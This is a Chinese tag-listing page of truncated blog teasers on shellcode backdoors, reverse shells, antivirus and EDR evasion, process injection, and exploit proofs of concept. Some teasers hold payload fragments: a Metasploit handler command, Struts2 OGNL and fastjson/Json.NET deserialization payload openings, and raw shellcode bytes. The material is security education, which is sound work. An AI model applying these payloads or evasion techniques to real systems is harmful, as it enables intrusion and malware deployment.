shellcode payload poc exp

1.9 动态解密ShellCode反弹

动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密,然后将加密后的代码回写到原始位置。当程序运行时,将动态解密加密代码,并将解密后的代码回写到原始位置,从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀,因为加密后的代码通常不会被标记为恶意代码。 ......
ShellCode 动态 1.9

1.7 完善自定位ShellCode

在之前的文章中,我们实现了一个正向的匿名管道`ShellCode`后门,为了保证文章的简洁易懂并没有增加针对调用函数的动态定位功能,此类方法在更换系统后则由于地址变化导致我们的后门无法正常使用,接下来将实现通过PEB获取`GetProcAddrees`函数地址,并根据该函数实现所需其他函数的地址自定... ......
ShellCode 1.7

1.8 运用C编写ShellCode代码

在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,... ......
ShellCode 代码 1.8

1.6 编写双管道ShellCode

本文将介绍如何将`CMD`绑定到双向管道上,这是一种常用的黑客反弹技巧,可以让用户在命令行界面下与其他程序进行交互,我们将从创建管道、启动进程、传输数据等方面对这个功能进行详细讲解。此外,本文还将通过使用汇编语言一步步来实现这个可被注入的`ShellCode`后门,并以此提高代码通用性。最终,我们将... ......
ShellCode 管道 1.6

1.5 编写自定位ShellCode弹窗

在笔者上一篇文章中简单的介绍了如何运用汇编语言编写一段弹窗代码,虽然简易`ShellCode`可以被正常执行,但却存在很多问题,由于采用了硬编址的方式来调用相应API函数的,那么就会存在一个很大的缺陷,如果操作系统的版本不统或系统重启过,那么基址将会发生变化,此时如果再次调用基址参数则会调用失败,本... ......
ShellCode 1.5

1.4 编写简易ShellCode弹窗

在前面的章节中相信读者已经学会了使用`Metasploit`工具生成自己的`ShellCode`代码片段了,本章将继续深入探索关于`ShellCode`的相关知识体系,ShellCode 通常是指一个原始的可执行代码的有效载荷,攻击者通常会使用这段代码来获得被攻陷系统上的交互Shell的访问权限,而... ......
简易 ShellCode 1.4

玄 - 利用DLL通知回调函数注入shellcode(上)

## 序 偶然看到某国外大佬发布新技术-“Threadless”进程注入技术,据说可过EDR(确实可),总结该技术原理 - 在远程目标进程中利用DLL通知回调机制执行shellcode,项目地址[在这里](https://github.com/ShorSec/DllNotificationInjec ......
函数 shellcode DLL

x64ShellCode-通过PEB获取模块地址.

以x64dbg.exe调试x64dbg.exe为例. 汇编代码为如下. ``` mov rax, qword ptr gs:[0x0000000000000060] mov rax, qword ptr ds:[rax+0x10] ``` 二进制硬编码如下 ``` "\x65\x48\x8B\x04 ......
ShellCode 模块 地址 PEB 64

EXP 一款 Java 插件化热插拔框架

Java extension plugin and hot swap plugin(Java 扩展点/插件系统,支持热插拔,旨在解决本地化软件的功能定制问题) ......
插件 框架 Java EXP

fastjson 1.2.80 漏洞浅析及利用payload

# 0x01 说明 在fastjson的1.2.80版本中可以通过将依赖加入到java.lang.Exception 期望类的子类中,绕过checkAuto。 # 0x02 简析 ``` { "@type":"java.lang.Exception", "@type":"org.codehaus.g ......
漏洞 fastjson payload 80

POC测试

PoC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的poc测试工作。 涉及到这个概念,转自文章 学习了解下 验证内容 1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,列出自己所需要的功能; ......
POC

ret2shellcode

# ret2shellcode ## 介绍 shellcode的意思其实就是能获取到shell的code,以前还疑惑为什么要交shellcode。 ## 解题 1、先查看附件信息 使用` checksec ret2shellcode`可以查看到ret2shellcode的信息;发现是32位的小端序, ......
ret2shellcode 2shellcode shellcode ret2 ret

windows下shellcode注入的例子(WriteProcessMemory+CreateRemoteThread)

vs里x64编译如下代码: #include <iostream> #include <Windows.h> // #include "common.h" int main() { // msfvenom -p windows/x64/exec CMD=notepad.exe -f c unsign ......

Json.NET反序列化漏洞生成Ysoserial攻击Payload

Ysoserial.Net只提供序列化之后的Payload主体,具体执行的命令从外部输入,实现代码清单如下 String payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Ver ......
序列 漏洞 Ysoserial Payload Json

1.8 运用C编写ShellCode代码

在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,... ......
ShellCode 代码 1.8

1.7 完善自定位ShellCode后门

在之前的文章中,我们实现了一个正向的匿名管道`ShellCode`后门,为了保证文章的简洁易懂并没有增加针对调用函数的动态定位功能,此类方法在更换系统后则由于地址变化导致我们的后门无法正常使用,接下来将实现通过PEB获取`GetProcAddrees`函数地址,并根据该函数实现所需其他函数的地址自定... ......
后门 ShellCode 1.7

1.6 编写双管道ShellCode后门

本文将介绍如何将`CMD`绑定到双向管道上,这是一种常用的黑客反弹技巧,可以让用户在命令行界面下与其他程序进行交互,我们将从创建管道、启动进程、传输数据等方面对这个功能进行详细讲解。此外,本文还将通过使用汇编语言一步步来实现这个可被注入的`ShellCode`后门,并以此提高代码通用性。最终,我们将... ......
后门 ShellCode 管道 1.6

1.5 编写自定位ShellCode弹窗

在笔者上一篇文章中简单的介绍了如何运用汇编语言编写一段弹窗代码,虽然简易`ShellCode`可以被正常执行,但却存在很多问题,由于采用了硬编址的方式来调用相应API函数的,那么就会存在一个很大的缺陷,如果操作系统的版本不统或系统重启过,那么基址将会发生变化,此时如果再次调用基址参数则会调用失败,本... ......
ShellCode 1.5

1.4 编写简易ShellCode弹窗

在前面的章节中相信读者已经学会了使用Metasploit工具生成自己的ShellCode代码片段了,本章将继续深入探索关于ShellCode的相关知识体系,ShellCode 通常是指一个原始的可执行代码的有效载荷,攻击者通常会使用这段代码来获得被攻陷系统上的交互Shell的访问权限,而现在用于描述... ......
简易 ShellCode 1.4

[渗透测试]—7.1 漏洞利用开发和Shellcode编写

在本章节中,我们将学习漏洞利用开发和Shellcode编写的基本概念和技巧。我们会尽量详细、通俗易懂地讲解,并提供尽可能多的实例。 ### 7.1 漏洞利用开发 漏洞利用开发是渗透测试中的高级技能。当你发现一个软件或系统存在漏洞时,你需要编写一段代码来利用这个漏洞,从而在目标系统上执行恶意代码、获取 ......
漏洞 Shellcode 7.1

白名单rundll32加载shellcode上线metasploit(nim学习系列)

# 白名单 rundll32 加载 shellcode 上线 metasploit 监听 metasploit ``` msfconsole -x "use exploits/multi/handler; set lhost 192.168.0.101; set lport 443; set pay ......
metasploit shellcode 名单 rundll nim

AV规避shellcode

[THM红队](https://tryhackme.com/room/avevasionshellcode) AV 规避:Shellcode 学习 shellcode 编码、打包、绑定器和加密器。 # 介绍 将探讨如何构建和交付有效载荷,重点是避免被常见的AV引擎检测到。 目标: - 了解 shel ......
shellcode

exp\imp导出导入

导出 exp test/1@127.0.0.1:1521/orcl file=D:\dmp\test.dmp log=D:\dmp\log\test_log.txt 导入 imp test/1@127.0.01:1521/orcl file=D:\dmp\test.dmp log=D:\dmp\lo ......
exp imp

驱动开发:内核ShellCode线程注入

还记得`《驱动开发:内核LoadLibrary实现DLL注入》`中所使用的注入技术吗,我们通过`RtlCreateUserThread`函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入`ShellCode`代码实现反弹Shell,这里需要注意一般情况下`RtlCreat... ......
线程 内核 ShellCode

nim 内联汇编加载 shellcode(nim学习系列)

# nim 内联汇编加载 shellcode ## GCC 汇编语法 Linux上的 GNU C 编译器 GCC ,使用 AT&T / UNIX 汇编语法,AT&T 语法和 Intel 语法的差别很大。现在我们看到了 Intel 语法和 AT&T 语法之间的一些主要差别。我仅仅写了它们差别的一部分而 ......
nim shellcode

蓝凌OA admin.do JNDI远程命令执行批量检测POC

漏洞描述 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用JNDI远程命令执行获取权限 FOFA app="Landray-OA系统" 漏洞过程 利用 蓝凌OA custom.jsp 任意文件读取漏 ......
命令 admin JNDI POC do

Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert(nim学习系列)

# Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert ## APC队列 异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队 ......

2023春秋杯 sigin_shellcode

# 2023春秋杯春季赛 sigin_shellcode ## 分析 ida打开,程序的主干如下,就是一个下落的游戏,主要有三个功能: 1. menu:进行选择,继续下落或者退出 2. shopping:用金币购买道具,用于增加攻击力 3. down:下落,其中有一个获取金币的函数,以及到达100层 ......
sigin_shellcode shellcode sigin 2023

CVE-2023-2825-GitLab目录穿越poc

# Gitlab CVE-2023-2825 目录穿越漏洞 # 前言 昨天 GitLab 出了一个版本目录穿越漏洞(CVE-2023-2825),可以任意读取文件。当时我进行了黑盒测试并复现了该漏洞。 > “ An unauthenticated malicious user can use a p ......
目录 GitLab 2023 2825 CVE

Struct2系列漏洞POC整理

# Struct2 -001 ```java %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c= ......
漏洞 Struct2 Struct POC